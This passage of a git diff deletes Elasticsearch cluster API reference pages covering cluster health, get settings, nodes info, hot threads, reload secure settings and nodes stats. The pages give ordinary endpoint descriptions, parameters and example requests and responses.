"wLzJm4N4RymDkBYxwWoJsg", - "name" : "node_t0", - "transport_address" : "127.0.0.1:9400", - "weight_ranking" : 1 - }, - "can_remain_on_current_node" : "yes", - "can_rebalance_cluster" : "yes", <1> - "can_rebalance_to_other_node" : "no", <2> - "rebalance_explanation" : "cannot rebalance as no target node exists that can both allocate this shard and improve the cluster balance", - "node_allocation_decisions" : [ - { - "node_id" : "oE3EGFc8QN-Tdi5FFEprIA", - "node_name" : "node_t1", - "transport_address" : "127.0.0.1:9401", - "node_decision" : "worse_balance", <3> - "weight_ranking" : 1 - } - ] -} --------------------------------------------------- -// NOTCONSOLE -<1> Whether rebalancing is allowed on the cluster. -<2> Whether the shard can be rebalanced to another node. -<3> The reason the shard cannot be rebalanced to the node, in this case indicating that it offers no better balance than the current node. diff --git a/docs/reference/cluster/get-settings.asciidoc b/docs/reference/cluster/get-settings.asciidoc deleted file mode 100644 index 16b88f60501..00000000000 --- a/docs/reference/cluster/get-settings.asciidoc +++ /dev/null @@ -1,43 +0,0 @@ -[[cluster-get-settings]] -=== Cluster get settings API -++++ -Cluster get settings -++++ - -Returns cluster-wide settings. - -[source,console] ----- -GET /_cluster/settings ----- - -[[cluster-get-settings-api-prereqs]] -==== {api-prereq-title} - -* If the {es} {security-features} are enabled, you must have the `monitor` or -`manage` <> to use this API. 
- -[[cluster-get-settings-api-request]] -==== {api-request-title} - -`GET /_cluster/settings` - -[[cluster-get-settings-api-desc]] -==== {api-description-title} - -By default, this API call only returns settings that have been explicitly -defined, but can also include the default settings by calling the -`include_defaults` parameter. - - -[[cluster-get-settings-api-query-params]] -==== {api-query-parms-title} - - -include::{es-repo-dir}/rest-api/common-parms.asciidoc[tag=flat-settings] - -`include_defaults`:: - (Optional, Boolean) If `true`, returns all default cluster settings. - Defaults to `false`. - -include::{es-repo-dir}/rest-api/common-parms.asciidoc[tag=timeoutparms] \ No newline at end of file diff --git a/docs/reference/cluster/health.asciidoc b/docs/reference/cluster/health.asciidoc deleted file mode 100644 index e958a29d75b..00000000000 --- a/docs/reference/cluster/health.asciidoc +++ /dev/null @@ -1,195 +0,0 @@ -[[cluster-health]] -=== Cluster health API -++++ -Cluster health -++++ - -Returns the health status of a cluster. - -[[cluster-health-api-request]] -==== {api-request-title} - -`GET /_cluster/health/` - -[[cluster-health-api-prereqs]] -==== {api-prereq-title} - -* If the {es} {security-features} are enabled, you must have the `monitor` or -`manage` <> to use this API. - -[[cluster-health-api-desc]] -==== {api-description-title} - -The cluster health API returns a simple status on the health of the -cluster. You can also use the API to get the health status of only specified -data streams and indices. For data streams, the API retrieves the health status -of the stream's backing indices. - -The cluster health status is: `green`, `yellow` or `red`. On the shard level, a -`red` status indicates that the specific shard is not allocated in the cluster, -`yellow` means that the primary shard is allocated but replicas are not, and -`green` means that all shards are allocated. The index level status is -controlled by the worst shard status. The cluster status is controlled by the -worst index status. - -One of the main benefits of the API is the ability to wait until the cluster -reaches a certain high water-mark health level. For example, the following will -wait for 50 seconds for the cluster to reach the `yellow` level (if it reaches -the `green` or `yellow` status before 50 seconds elapse, it will return at that -point): - -[source,console] --------------------------------------------------- -GET /_cluster/health?wait_for_status=yellow&timeout=50s --------------------------------------------------- - -[[cluster-health-api-path-params]] -==== {api-path-parms-title} - -``:: -(Optional, string) -Comma-separated list of data streams, indices, and index aliases used to limit -the request. Wildcard expressions (`*`) are supported. -+ -To target all data streams and indices in a cluster, omit this parameter or use -`_all` or `*`. - -[[cluster-health-api-query-params]] -==== {api-query-parms-title} - -`level`:: - (Optional, string) Can be one of `cluster`, `indices` or `shards`. Controls - the details level of the health information returned. Defaults to `cluster`. - -include::{es-repo-dir}/rest-api/common-parms.asciidoc[tag=local] - -include::{es-repo-dir}/rest-api/common-parms.asciidoc[tag=timeoutparms] - -`wait_for_active_shards`:: - (Optional, string) A number controlling to how many active shards to wait - for, `all` to wait for all shards in the cluster to be active, or `0` to not - wait. Defaults to `0`. 
-
-`wait_for_events`::
- (Optional, string) Can be one of `immediate`, `urgent`, `high`, `normal`,
- `low`, `languid`. Wait until all currently queued events with the given
- priority are processed.
-
-`wait_for_no_initializing_shards`::
- (Optional, Boolean) Controls whether to wait (until the timeout provided)
- for the cluster to have no shard initializations. Defaults to `false`, which
- means it will not wait for initializing shards.
-
-`wait_for_no_relocating_shards`::
- (Optional, Boolean) Controls whether to wait (until the timeout provided)
- for the cluster to have no shard relocations. Defaults to `false`, which
- means it will not wait for relocating shards.
-
-`wait_for_nodes`::
- (Optional, string) The request waits until the specified number `N` of
- nodes is available. It also accepts `>=N`, `<=N`, `>N` and `<N`.
- Alternatively, it is possible to use `ge(N)`, `le(N)`, `gt(N)` and `lt(N)`
- notation.
-
-`wait_for_status`::
- (Optional, string) One of `green`, `yellow` or `red`. Will wait (until the
- timeout provided) until the status of the cluster changes to the one
- provided or better, i.e. `green` > `yellow` > `red`. By default, will not
- wait for any status.
-
-[[cluster-health-api-response-body]]
-==== {api-response-body-title}
-
-`cluster_name`::
- (string) The name of the cluster.
-
-`status`::
-include::{es-repo-dir}/rest-api/common-parms.asciidoc[tag=cluster-health-status]
-
-`timed_out`::
- (Boolean) If `false`, the response returned within the period of time
- specified by the `timeout` parameter (`30s` by default).
-
-`number_of_nodes`::
- (integer) The number of nodes within the cluster.
-
-`number_of_data_nodes`::
- (integer) The number of nodes that are dedicated data nodes.
-
-`active_primary_shards`::
- (integer) The number of active primary shards.
-
-`active_shards`::
- (integer) The total number of active primary and replica shards.
-
-`relocating_shards`::
- (integer) The number of shards that are under relocation.
-
-`initializing_shards`::
- (integer) The number of shards that are under initialization.
-
-`unassigned_shards`::
- (integer) The number of shards that are not allocated.
-
-`delayed_unassigned_shards`::
- (integer) The number of shards whose allocation has been delayed by the
- timeout settings.
-
-`number_of_pending_tasks`::
- (integer) The number of cluster-level changes that have not yet been
- executed.
-
-`number_of_in_flight_fetch`::
- (integer) The number of unfinished fetches.
-
-`task_max_waiting_in_queue_millis`::
- (integer) The time in milliseconds that the earliest initiated task has been
- waiting to be performed.
-
-`active_shards_percent_as_number`::
- (float) The ratio of active shards in the cluster expressed as a percentage.
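
The `wait_for_*` query parameters described above can be combined in a single
request. As a rough sketch (the node count and timeout are arbitrary), the
following call uses the `ge(N)` notation and returns once the cluster has at
least three nodes and no relocating shards, or when the 30 second timeout
expires:

[source,console]
--------------------------------------------------
GET /_cluster/health?wait_for_nodes=ge(3)&wait_for_no_relocating_shards=true&timeout=30s
--------------------------------------------------
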
- -[[cluster-health-api-example]] -==== {api-examples-title} - -[source,console] --------------------------------------------------- -GET _cluster/health --------------------------------------------------- -// TEST[s/^/PUT test1\n/] - -The API returns the following response in case of a quiet single node cluster -with a single index with one shard and one replica: - -[source,console-result] --------------------------------------------------- -{ - "cluster_name" : "testcluster", - "status" : "yellow", - "timed_out" : false, - "number_of_nodes" : 1, - "number_of_data_nodes" : 1, - "active_primary_shards" : 1, - "active_shards" : 1, - "relocating_shards" : 0, - "initializing_shards" : 0, - "unassigned_shards" : 1, - "delayed_unassigned_shards": 0, - "number_of_pending_tasks" : 0, - "number_of_in_flight_fetch": 0, - "task_max_waiting_in_queue_millis": 0, - "active_shards_percent_as_number": 50.0 -} --------------------------------------------------- -// TESTRESPONSE[s/testcluster/integTest/] -// TESTRESPONSE[s/"number_of_pending_tasks" : 0,/"number_of_pending_tasks" : $body.number_of_pending_tasks,/] -// TESTRESPONSE[s/"task_max_waiting_in_queue_millis": 0/"task_max_waiting_in_queue_millis": $body.task_max_waiting_in_queue_millis/] - -The following is an example of getting the cluster health at the -`shards` level: - -[source,console] --------------------------------------------------- -GET /_cluster/health/my-index-000001?level=shards --------------------------------------------------- -// TEST[setup:my_index] diff --git a/docs/reference/cluster/nodes-hot-threads.asciidoc b/docs/reference/cluster/nodes-hot-threads.asciidoc deleted file mode 100644 index 5e1fa9a36a2..00000000000 --- a/docs/reference/cluster/nodes-hot-threads.asciidoc +++ /dev/null @@ -1,72 +0,0 @@ -[[cluster-nodes-hot-threads]] -=== Nodes hot threads API -++++ -Nodes hot threads -++++ - -Returns the hot threads on each selected node in the cluster. - - -[[cluster-nodes-hot-threads-api-request]] -==== {api-request-title} - -`GET /_nodes/hot_threads` + - -`GET /_nodes//hot_threads` - -[[cluster-nodes-hot-threads-api-prereqs]] -==== {api-prereq-title} - -* If the {es} {security-features} are enabled, you must have the `monitor` or -`manage` <> to use this API. - -[[cluster-nodes-hot-threads-api-desc]] -==== {api-description-title} - -This API yields a breakdown of the hot threads on each selected node in the -cluster. The output is plain text with a breakdown of each node's top hot -threads. - - -[[cluster-nodes-hot-threads-api-path-params]] -==== {api-path-parms-title} - -include::{es-repo-dir}/rest-api/common-parms.asciidoc[tag=node-id] - - -[[cluster-nodes-hot-threads-api-query-params]] -==== {api-query-parms-title} - - -`ignore_idle_threads`:: - (Optional, Boolean) If true, known idle threads (e.g. waiting in a socket - select, or to get a task from an empty queue) are filtered out. Defaults to - true. - -`interval`:: - (Optional, <>) The interval to do the second - sampling of threads. Defaults to `500ms`. - -`snapshots`:: - (Optional, integer) Number of samples of thread stacktrace. Defaults to - `10`. - -`threads`:: - (Optional, integer) Specifies the number of hot threads to provide - information for. Defaults to `3`. - -include::{es-repo-dir}/rest-api/common-parms.asciidoc[tag=timeoutparms] - -`type`:: - (Optional, string) The type to sample. Available options are `block`, `cpu`, and - `wait`. Defaults to `cpu`. 
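
These defaults can be overridden per request. For example (the values are
arbitrary), the following sketch reports the five hottest threads on each node,
samples them at one second intervals, and looks at time spent blocked rather
than time spent on CPU:

[source,console]
--------------------------------------------------
GET /_nodes/hot_threads?threads=5&interval=1s&type=block
--------------------------------------------------
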
- - -[[cluster-nodes-hot-threads-api-example]] -==== {api-examples-title} - -[source,console] --------------------------------------------------- -GET /_nodes/hot_threads -GET /_nodes/nodeId1,nodeId2/hot_threads --------------------------------------------------- diff --git a/docs/reference/cluster/nodes-info.asciidoc b/docs/reference/cluster/nodes-info.asciidoc deleted file mode 100644 index 4b8d2e6be50..00000000000 --- a/docs/reference/cluster/nodes-info.asciidoc +++ /dev/null @@ -1,355 +0,0 @@ -[[cluster-nodes-info]] -=== Nodes info API -++++ -Nodes info -++++ - -Returns cluster nodes information. - - -[[cluster-nodes-info-api-request]] -==== {api-request-title} - -`GET /_nodes` + - -`GET /_nodes/` + - -`GET /_nodes/` + - -`GET /_nodes//` - -[[cluster-nodes-info-api-prereqs]] -==== {api-prereq-title} - -* If the {es} {security-features} are enabled, you must have the `monitor` or -`manage` <> to use this API. - - -[[cluster-nodes-info-api-desc]] -==== {api-description-title} - -The cluster nodes info API allows to retrieve one or more (or all) of -the cluster nodes information. All the nodes selective options are explained -<>. - -By default, it returns all attributes and core settings for a node. - -[role="child_attributes"] -[[cluster-nodes-info-api-path-params]] -==== {api-path-parms-title} - -``:: -(Optional, string) -Limits the information returned to the specific metrics. Supports a -comma-separated list, such as `http,ingest`. -+ -[%collapsible%open] -.Valid values for `` -==== -`http`:: -HTTP connection information. - -`ingest`:: -Statistics about ingest preprocessing. - -`jvm`:: -JVM stats, memory pool information, garbage collection, buffer pools, number of -loaded/unloaded classes. - -`os`:: -Operating system stats, load average, mem, swap. - -`plugins`:: -+ --- -Details about the installed plugins and modules per node. The following -information is available for each plugin and module: - -* `name`: plugin name -* `version`: version of Elasticsearch the plugin was built for -* `description`: short description of the plugin's purpose -* `classname`: fully-qualified class name of the plugin's entry point -* `has_native_controller`: whether or not the plugin has a native controller -process --- - -`process`:: -Process statistics, memory consumption, cpu usage, open file descriptors. - -`settings`:: -Lists all node settings in use as defined in the `elasticsearch.yml` file. - -`thread_pool`:: -Statistics about each thread pool, including current size, queue and rejected -tasks - -`transport`:: -Transport statistics about sent and received bytes in cluster communication. -==== - - -include::{es-repo-dir}/rest-api/common-parms.asciidoc[tag=node-id] - - -[[cluster-nodes-info-api-response-body]] -==== {api-response-body-title} - -`build_hash`:: - Short hash of the last git commit in this release. - -`host`:: - The node's host name. - -`ip`:: - The node's IP address. - -`name`:: - The node's name. - -`total_indexing_buffer`:: - Total heap allowed to be used to hold recently indexed - documents before they must be written to disk. This size is - a shared pool across all shards on this node, and is - controlled by <>. - -`total_indexing_buffer_in_bytes`:: - Same as `total_indexing_buffer`, but expressed in bytes. - -`transport_address`:: - Host and port where transport HTTP connections are accepted. - -`version`:: - {es} version running on this node. 
- -The `os` flag can be set to retrieve information that concern the operating -system: - -`os.refresh_interval_in_millis`:: - Refresh interval for the OS statistics - -`os.name`:: - Name of the operating system (ex: Linux, Windows, Mac OS X) - -`os.arch`:: - Name of the JVM architecture (ex: amd64, x86) - -`os.version`:: - Version of the operating system - -`os.available_processors`:: - Number of processors available to the Java virtual machine - -`os.allocated_processors`:: - The number of processors actually used to calculate thread pool size. This - number can be set with the <> - setting of a node and defaults to the number of processors reported by - the OS. - -The `process` flag can be set to retrieve information that concern the current -running process: - -`process.refresh_interval_in_millis`:: - Refresh interval for the process statistics - -`process.id`:: - Process identifier (PID) - -`process.mlockall`:: - Indicates if the process address space has been successfully locked in memory - - -[[cluster-nodes-info-api-query-params]] -==== {api-query-parms-title} - -include::{es-repo-dir}/rest-api/common-parms.asciidoc[tag=flat-settings] - -include::{es-repo-dir}/rest-api/common-parms.asciidoc[tag=timeoutparms] - - -[[cluster-nodes-info-api-example]] -==== {api-examples-title} - -[source,console] --------------------------------------------------- -# return just process -GET /_nodes/process - -# same as above -GET /_nodes/_all/process - -# return just jvm and process of only nodeId1 and nodeId2 -GET /_nodes/nodeId1,nodeId2/jvm,process - -# same as above -GET /_nodes/nodeId1,nodeId2/info/jvm,process - -# return all the information of only nodeId1 and nodeId2 -GET /_nodes/nodeId1,nodeId2/_all --------------------------------------------------- - -The `_all` flag can be set to return all the information - or you can omit it. - - -[[cluster-nodes-info-api-example-plugins]] -===== Example for plugins metric - -If `plugins` is specified, the result will contain details about the installed -plugins and modules: - -[source,console] --------------------------------------------------- -GET /_nodes/plugins --------------------------------------------------- -// TEST[setup:node] - -The API returns the following response: - -[source,console-result] --------------------------------------------------- -{ - "_nodes": ... 
- "cluster_name": "elasticsearch", - "nodes": { - "USpTGYaBSIKbgSUJR2Z9lg": { - "name": "node-0", - "transport_address": "192.168.17:9300", - "host": "node-0.elastic.co", - "ip": "192.168.17", - "version": "{version}", - "build_flavor": "{build_flavor}", - "build_type": "{build_type}", - "build_hash": "587409e", - "roles": [ - "master", - "data", - "ingest" - ], - "attributes": {}, - "plugins": [ - { - "name": "analysis-icu", - "version": "{version}", - "description": "The ICU Analysis plugin integrates Lucene ICU module into elasticsearch, adding ICU relates analysis components.", - "classname": "org.elasticsearch.plugin.analysis.icu.AnalysisICUPlugin", - "has_native_controller": false - } - ], - "modules": [ - { - "name": "lang-painless", - "version": "{version}", - "description": "An easy, safe and fast scripting language for Elasticsearch", - "classname": "org.elasticsearch.painless.PainlessPlugin", - "has_native_controller": false - } - ] - } - } -} --------------------------------------------------- -// TESTRESPONSE[s/"_nodes": \.\.\./"_nodes": $body.$_path,/] -// TESTRESPONSE[s/"elasticsearch"/$body.cluster_name/] -// TESTRESPONSE[s/"USpTGYaBSIKbgSUJR2Z9lg"/\$node_name/] -// TESTRESPONSE[s/"name": "node-0"/"name": $body.$_path/] -// TESTRESPONSE[s/"transport_address": "192.168.17:9300"/"transport_address": $body.$_path/] -// TESTRESPONSE[s/"host": "node-0.elastic.co"/"host": $body.$_path/] -// TESTRESPONSE[s/"ip": "192.168.17"/"ip": $body.$_path/] -// TESTRESPONSE[s/"build_hash": "587409e"/"build_hash": $body.$_path/] -// TESTRESPONSE[s/"roles": \[[^\]]*\]/"roles": $body.$_path/] -// TESTRESPONSE[s/"attributes": \{[^\}]*\}/"attributes": $body.$_path/] -// TESTRESPONSE[s/"plugins": \[[^\]]*\]/"plugins": $body.$_path/] -// TESTRESPONSE[s/"modules": \[[^\]]*\]/"modules": $body.$_path/] - - -[[cluster-nodes-info-api-example-ingest]] -===== Example for ingest metric - -If `ingest` is specified, the response contains details about the available -processors per node: - -[source,console] --------------------------------------------------- -GET /_nodes/ingest --------------------------------------------------- -// TEST[setup:node] - -The API returns the following response: - -[source,console-result] --------------------------------------------------- -{ - "_nodes": ... 
- "cluster_name": "elasticsearch", - "nodes": { - "USpTGYaBSIKbgSUJR2Z9lg": { - "name": "node-0", - "transport_address": "192.168.17:9300", - "host": "node-0.elastic.co", - "ip": "192.168.17", - "version": "{version}", - "build_flavor": "{build_flavor}", - "build_type": "{build_type}", - "build_hash": "587409e", - "roles": [], - "attributes": {}, - "ingest": { - "processors": [ - { - "type": "date" - }, - { - "type": "uppercase" - }, - { - "type": "set" - }, - { - "type": "lowercase" - }, - { - "type": "gsub" - }, - { - "type": "convert" - }, - { - "type": "remove" - }, - { - "type": "fail" - }, - { - "type": "foreach" - }, - { - "type": "split" - }, - { - "type": "trim" - }, - { - "type": "rename" - }, - { - "type": "join" - }, - { - "type": "append" - } - ] - } - } - } -} --------------------------------------------------- -// TESTRESPONSE[s/"_nodes": \.\.\./"_nodes": $body.$_path,/] -// TESTRESPONSE[s/"elasticsearch"/$body.cluster_name/] -// TESTRESPONSE[s/"USpTGYaBSIKbgSUJR2Z9lg"/\$node_name/] -// TESTRESPONSE[s/"name": "node-0"/"name": $body.$_path/] -// TESTRESPONSE[s/"transport_address": "192.168.17:9300"/"transport_address": $body.$_path/] -// TESTRESPONSE[s/"host": "node-0.elastic.co"/"host": $body.$_path/] -// TESTRESPONSE[s/"ip": "192.168.17"/"ip": $body.$_path/] -// TESTRESPONSE[s/"build_hash": "587409e"/"build_hash": $body.$_path/] -// TESTRESPONSE[s/"roles": \[[^\]]*\]/"roles": $body.$_path/] -// TESTRESPONSE[s/"attributes": \{[^\}]*\}/"attributes": $body.$_path/] -// TESTRESPONSE[s/"processors": \[[^\]]*\]/"processors": $body.$_path/] diff --git a/docs/reference/cluster/nodes-reload-secure-settings.asciidoc b/docs/reference/cluster/nodes-reload-secure-settings.asciidoc deleted file mode 100644 index 4ccebe6b60c..00000000000 --- a/docs/reference/cluster/nodes-reload-secure-settings.asciidoc +++ /dev/null @@ -1,98 +0,0 @@ -[[cluster-nodes-reload-secure-settings]] -=== Nodes reload secure settings API -++++ -Nodes reload secure settings -++++ - -Reloads the keystore on nodes in the cluster. - -[[cluster-nodes-reload-secure-settings-api-request]] -==== {api-request-title} - -`POST /_nodes/reload_secure_settings` + -`POST /_nodes//reload_secure_settings` - -[[cluster-nodes-reload-secure-settings-api-prereqs]] -==== {api-prereq-title} - -* If the {es} {security-features} are enabled, you must have the `manage` -<> to use this API. - -[[cluster-nodes-reload-secure-settings-api-desc]] -==== {api-description-title} - -<> are stored in an on-disk keystore. Certain -of these settings are <>. That is, you -can change them on disk and reload them without restarting any nodes in the -cluster. When you have updated reloadable secure settings in your keystore, you -can use this API to reload those settings on each node. - -When the {es} keystore is password protected and not simply obfuscated, you must -provide the password for the keystore when you reload the secure settings. -Reloading the settings for the whole cluster assumes that all nodes' keystores -are protected with the same password; this method is allowed only when -<>. Alternatively, you can -reload the secure settings on each node by locally accessing the API and passing -the node-specific {es} keystore password. - -[[cluster-nodes-reload-secure-settings-path-params]] -==== {api-path-parms-title} - -``:: - (Optional, string) The names of particular nodes in the cluster to target. - For example, `nodeId1,nodeId2`. For node selection options, see - <>. 
- -NOTE: {es} requires consistent secure settings across the cluster nodes, but -this consistency is not enforced. Hence, reloading specific nodes is not -standard. It is justifiable only when retrying failed reload operations. - -[[cluster-nodes-reload-secure-settings-api-request-body]] -==== {api-request-body-title} - -`secure_settings_password`:: - (Optional, string) The password for the {es} keystore. - -[[cluster-nodes-reload-secure-settings-api-example]] -==== {api-examples-title} - -The following examples assume a common password for the {es} keystore on every -node of the cluster: - -[source,console] --------------------------------------------------- -POST _nodes/reload_secure_settings -{ - "secure_settings_password":"s3cr3t" -} -POST _nodes/nodeId1,nodeId2/reload_secure_settings -{ - "secure_settings_password":"s3cr3t" -} --------------------------------------------------- -// TEST[setup:node] -// TEST[s/nodeId1,nodeId2/*/] - -The response contains the `nodes` object, which is a map, keyed by the -node id. Each value has the node `name` and an optional `reload_exception` -field. The `reload_exception` field is a serialization of the exception -that was thrown during the reload process, if any. - -[source,console-result] --------------------------------------------------- -{ - "_nodes": { - "total": 1, - "successful": 1, - "failed": 0 - }, - "cluster_name": "my_cluster", - "nodes": { - "pQHNt5rXTTWNvUgOrdynKg": { - "name": "node-0" - } - } -} --------------------------------------------------- -// TESTRESPONSE[s/"my_cluster"/$body.cluster_name/] -// TESTRESPONSE[s/"pQHNt5rXTTWNvUgOrdynKg"/\$node_name/] diff --git a/docs/reference/cluster/nodes-stats.asciidoc b/docs/reference/cluster/nodes-stats.asciidoc deleted file mode 100644 index a9eba907526..00000000000 --- a/docs/reference/cluster/nodes-stats.asciidoc +++ /dev/null @@ -1,2367 +0,0 @@ -[[cluster-nodes-stats]] -=== Nodes stats API -++++ -Nodes stats -++++ - -Returns cluster nodes statistics. - -[[cluster-nodes-stats-api-request]] -==== {api-request-title} - -`GET /_nodes/stats` + - -`GET /_nodes//stats` + - -`GET/_nodes/stats/` + - -`GET/_nodes//stats/` + - -`GET /_nodes/stats//` + - -`GET /_nodes//stats//` - -[[cluster-nodes-stats-api-prereqs]] -==== {api-prereq-title} - -* If the {es} {security-features} are enabled, you must have the `monitor` or -`manage` <> to use this API. - -[[cluster-nodes-stats-api-desc]] -==== {api-description-title} - -You can use the cluster nodes stats API to retrieve statistics for nodes in a cluster. - - -All the nodes selective options are explained <>. - -By default, all stats are returned. You can limit the returned information by -using metrics. - -[[cluster-nodes-stats-api-path-params]] -==== {api-path-parms-title} - - -``:: - (Optional, string) Limits the information returned to the specific metrics. - A comma-separated list of the following options: -+ --- - `adaptive_selection`:: - Statistics about <>. - - `breaker`:: - Statistics about the field data circuit breaker. - - `discovery`:: - Statistics about the discovery. - - `fs`:: - File system information, data path, free disk space, read/write - stats. - - `http`:: - HTTP connection information. - - `indexing_pressure`:: - Statistics about the node's indexing load and related rejections. - - `indices`:: - Indices stats about size, document count, indexing and deletion times, - search times, field cache size, merges and flushes. - - `ingest`:: - Statistics about ingest preprocessing. 
- - `jvm`:: - JVM stats, memory pool information, garbage collection, buffer - pools, number of loaded/unloaded classes. - - `os`:: - Operating system stats, load average, mem, swap. - - `process`:: - Process statistics, memory consumption, cpu usage, open - file descriptors. - - `thread_pool`:: - Statistics about each thread pool, including current size, queue and - rejected tasks. - - `transport`:: - Transport statistics about sent and received bytes in cluster - communication. --- - -``:: - (Optional, string) Limit the information returned for `indices` metric to - the specific index metrics. It can be used only if `indices` (or `all`) - metric is specified. Supported metrics are: -+ --- - * `completion` - * `docs` - * `fielddata` - * `flush` - * `get` - * `indexing` - * `merge` - * `query_cache` - * `recovery` - * `refresh` - * `request_cache` - * `search` - * `segments` - * `store` - * `translog` - * `warmer` --- - -include::{es-repo-dir}/rest-api/common-parms.asciidoc[tag=node-id] - - -[[cluster-nodes-stats-api-query-params]] -==== {api-query-parms-title} - -include::{es-repo-dir}/rest-api/common-parms.asciidoc[tag=completion-fields] - -include::{es-repo-dir}/rest-api/common-parms.asciidoc[tag=fielddata-fields] - -include::{es-repo-dir}/rest-api/common-parms.asciidoc[tag=fields] - -include::{es-repo-dir}/rest-api/common-parms.asciidoc[tag=groups] - -include::{es-repo-dir}/rest-api/common-parms.asciidoc[tag=level] - -`types`:: - (Optional, string) A comma-separated list of document types for the - `indexing` index metric. - -include::{es-repo-dir}/rest-api/common-parms.asciidoc[tag=timeoutparms] - -include::{es-repo-dir}/rest-api/common-parms.asciidoc[tag=include-segment-file-sizes] - -[role="child_attributes"] -[[cluster-nodes-stats-api-response-body]] -==== {api-response-body-title} - -`_nodes`:: -(object) -Contains statistics about the number of nodes selected by the request. -+ -.Properties of `_nodes` -[%collapsible%open] -==== -`total`:: -(integer) -Total number of nodes selected by the request. - -`successful`:: -(integer) -Number of nodes that responded successfully to the request. - -`failed`:: -(integer) -Number of nodes that rejected the request or failed to respond. If this value -is not `0`, a reason for the rejection or failure is included in the response. -==== - -`cluster_name`:: -(string) -Name of the cluster. Based on the <> setting. - -`nodes`:: -(object) -Contains statistics for the nodes selected by the request. -+ -.Properties of `nodes` -[%collapsible%open] -==== -``:: -(object) -Contains statistics for the node. -+ -.Properties of `` -[%collapsible%open] -===== -`timestamp`:: -(integer) -Time the node stats were collected for this response. Recorded in milliseconds -since the {wikipedia}/Unix_time[Unix Epoch]. - -`name`:: -(string) -Human-readable identifier for the node. Based on the <> setting. - -`transport_address`:: -(string) -Host and port for the <>, used for internal -communication between nodes in a cluster. - -`host`:: -(string) -Network host for the node, based on the <> setting. - -`ip`:: -(string) -IP address and port for the node. - -`roles`:: -(array of strings) -Roles assigned to the node. See <>. - -`attributes`:: -(object) -Contains a list of attributes for the node. - -[[cluster-nodes-stats-api-response-body-indices]] -`indices`:: -(object) -Contains statistics about indices with shards assigned to the node. 
-+ -.Properties of `indices` -[%collapsible%open] -====== -`docs`:: -(object) -Contains statistics about documents across all primary shards assigned to the -node. -+ -.Properties of `docs` -[%collapsible%open] -======= -`count`:: -(integer) -include::{es-repo-dir}/rest-api/common-parms.asciidoc[tag=docs-count] - -`deleted`:: -(integer) -include::{es-repo-dir}/rest-api/common-parms.asciidoc[tag=docs-deleted] -======= - -`store`:: -(object) -Contains statistics about the size of shards assigned to the node. -+ -.Properties of `store` -[%collapsible%open] -======= -`size`:: -(<>) -Total size of all shards assigned to the node. - -`size_in_bytes`:: -(integer) -Total size, in bytes, of all shards assigned to the node. - -`reserved`:: -(<>) -A prediction of how much larger the shard stores on this node will eventually -grow due to ongoing peer recoveries, restoring snapshots, and similar -activities. A value of `-1b` indicates that this is not available. - -`reserved_in_bytes`:: -(integer) -A prediction, in bytes, of how much larger the shard stores on this node will -eventually grow due to ongoing peer recoveries, restoring snapshots, and -similar activities. A value of `-1` indicates that this is not available. -======= - -`indexing`:: -(object) -Contains statistics about indexing operations for the node. -+ -.Properties of `indexing` -[%collapsible%open] -======= -`index_total`:: -(integer) -Total number of indexing operations. - -`index_time`:: -(<>) -Total time spent performing indexing operations. - -`index_time_in_millis`:: -(integer) -Total time in milliseconds -spent performing indexing operations. - -`index_current`:: -(integer) -Number of indexing operations currently running. - -`index_failed`:: -(integer) -Number of failed indexing operations. - -`delete_total`:: -(integer) -Total number of deletion operations. - -`delete_time`:: -(<>) -Time spent performing deletion operations. - -`delete_time_in_millis`:: -(integer) -Time in milliseconds -spent performing deletion operations. - -`delete_current`:: -(integer) -Number of deletion operations currently running. - -`noop_update_total`:: -(integer) -Total number of noop operations. - -`is_throttled`:: -(Boolean) -Number of times -operations were throttled. - -`throttle_time`:: -(<>) -Total time spent throttling operations. - -`throttle_time_in_millis`:: -(integer) -Total time in milliseconds -spent throttling operations. -======= - -`get`:: -(object) -Contains statistics about get operations for the node. -+ -.Properties of `get` -[%collapsible%open] -======= -`total`:: -(integer) -Total number of get operations. - -`getTime`:: -(<>) -Time spent performing get operations. - -`time_in_millis`:: -(integer) -Time in milliseconds -spent performing get operations. - -`exists_total`:: -(integer) -Total number of successful get operations. - -`exists_time`:: -(<>) -Time spent performing successful get operations. - -`exists_time_in_millis`:: -(integer) -Time in milliseconds -spent performing successful get operations. - -`missing_total`:: -(integer) -Total number of failed get operations. - -`missing_time`:: -(<>) -Time spent performing failed get operations. - -`missing_time_in_millis`:: -(integer) -Time in milliseconds -spent performing failed get operations. - -`current`:: -(integer) -Number of get operations currently running. -======= - -`search`:: -(object) -Contains statistics about search operations for the node. -+ -.Properties of `search` -[%collapsible%open] -======= -`open_contexts`:: -(integer) -Number of open search contexts. 
- -`query_total`:: -(integer) -Total number of query operations. - -`query_time`:: -(<>) -Time spent performing query operations. - -`query_time_in_millis`:: -(integer) -Time in milliseconds -spent performing query operations. - -`query_current`:: -(integer) -Number of query operations currently running. - -`fetch_total`:: -(integer) -Total number of fetch operations. - -`fetch_time`:: -(<>) -Time spent performing fetch operations. - -`fetch_time_in_millis`:: -(integer) -Time in milliseconds -spent performing fetch operations. - -`fetch_current`:: -(integer) -Number of fetch operations currently running. - -`scroll_total`:: -(integer) -Total number of scroll operations. - -`scroll_time`:: -(<>) -Time spent performing scroll operations. - -`scroll_time_in_millis`:: -(integer) -Time in milliseconds -spent performing scroll operations. - -`scroll_current`:: -(integer) -Number of scroll operations currently running. - -`suggest_total`:: -(integer) -Total number of suggest operations. - -`suggest_time`:: -(<>) -Time spent performing suggest operations. - -`suggest_time_in_millis`:: -(integer) -Time in milliseconds -spent performing suggest operations. - -`suggest_current`:: -(integer) -Number of suggest operations currently running. -======= - -`merges`:: -(object) -Contains statistics about merge operations for the node. -+ -.Properties of `merges` -[%collapsible%open] -======= -`current`:: -(integer) -Number of merge operations currently running. - -`current_docs`:: -(integer) -Number of document merges currently running. - -`current_size`:: -(<>) -Memory used performing current document merges. - -`current_size_in_bytes`:: -(integer) -Memory, in bytes, used performing current document merges. - -`total`:: -(integer) -Total number of merge operations. - -`total_time`:: -(<>) -Total time spent performing merge operations. - -`total_time_in_millis`:: -(integer) -Total time in milliseconds -spent performing merge operations. - -`total_docs`:: -(integer) -Total number of merged documents. - -`total_size`:: -(<>) -Total size of document merges. - -`total_size_in_bytes`:: -(integer) -Total size of document merges in bytes. - -`total_stopped_time`:: -(<>) -Total time spent stopping merge operations. - -`total_stopped_time_in_millis`:: -(integer) -Total time in milliseconds -spent stopping merge operations. - -`total_throttled_time`:: -(<>) -Total time spent throttling merge operations. - -`total_throttled_time_in_millis`:: -(integer) -Total time in milliseconds -spent throttling merge operations. - -`total_auto_throttle`:: -(<>) -Size of automatically throttled merge operations. - -`total_auto_throttle_in_bytes`:: -(integer) -Size, in bytes, of automatically throttled merge operations. -======= 